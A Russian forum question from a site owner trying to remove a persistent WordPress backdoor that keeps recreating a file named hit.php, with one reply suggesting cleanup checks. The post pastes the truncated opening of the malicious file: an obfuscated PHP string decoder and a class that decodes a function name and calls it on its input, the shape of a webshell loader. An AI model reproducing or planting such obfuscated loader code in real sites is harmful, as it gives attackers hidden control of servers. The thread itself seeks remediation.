@easycode
немного программирую...

Как же всё-таки полностью излечить WordPress-сайт от вируса backdoor cSR?

На WordPress-сайт был замечен вирус, код которого успел размножиться по файлам: wp-config.php, index.php, а также создал другие файлы в разных папках.

В итоге, чтобы было сделано:
1) С помощью сканера плагина Wordfence Security нашли все вирусные файлы и удалили
2) Полностью перезаписали все файлы WordPress
3) Установили и настроили как следует iThemes Security
4) Сменили пароль на FTP, сменили пароли в админку WP

Вот уже третий день, проблема такая:
- в корне сайта создается файл hit.php, с таким начальным содержимым (файл длинный, не всё вставляю):

<?php

					function r6ZVq($DxfSB3xgkeK)
{
$yWj2kmO='jbJPz';
$oeUU7hsO='ZTV1IH';

$DxfSB3xgkeK=base64_decode($DxfSB3xgkeK);

$yHBPZX=17;
$heUw1F=(1130+1433-2352);

$KMyJBhO=(606-1191+585);
						$IZk1uAY='';

while(true)
		{

if($KMyJBhO==strlen($DxfSB3xgkeK))

break;
		elseif($KMyJBhO%(-1007+152+857)==0)
					$HD5ZzPdib=(ord($DxfSB3xgkeK[$KMyJBhO])-$yHBPZX)%(929+1366-2039);
					else
				$HD5ZzPdib=ord($DxfSB3xgkeK[$KMyJBhO])^$heUw1F;
$IZk1uAY.=chr($HD5ZzPdib);
					$KMyJBhO+=1;
}
				return $IZk1uAY;
}

				class ItuCN4Hc

{

					static public function qmUFL($bRS8AA)

{
	$D5QnuExrvE5='YPwT9Scmfvv';
$UB6Ai=r6ZVq("dquFtn+gerx/jH28crd2tw==");
	return $UB6Ai($bRS8AA);
}


Wordfence Security ругается на него так:
GFce7eRXTiW34C35t9vBzQ.png

Что же еще нужно сделать? Как у этого вируса получается создавать этот файл? Где искать?
  • Вопрос задан
  • 179 просмотров
Пригласить эксперта
Ответы на вопрос 1
@azerphoenix
Проверяйте БД на наличие лишних таблиц
Проверьте содержимое functions.php
Просканируйте при помощи Вордвенса на наличие лишних файлов в wp-includes wp-content
Если вы устанавливали "левые" премиум плагины, то просмотрите содержимое их файлов.
Ответ написан
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через TM ID
Похожие вопросы
19 авг. 2018, в 17:22
1000 руб./в час
19 авг. 2018, в 17:11
200000 руб./за проект
19 авг. 2018, в 12:12
40000 руб./в месяц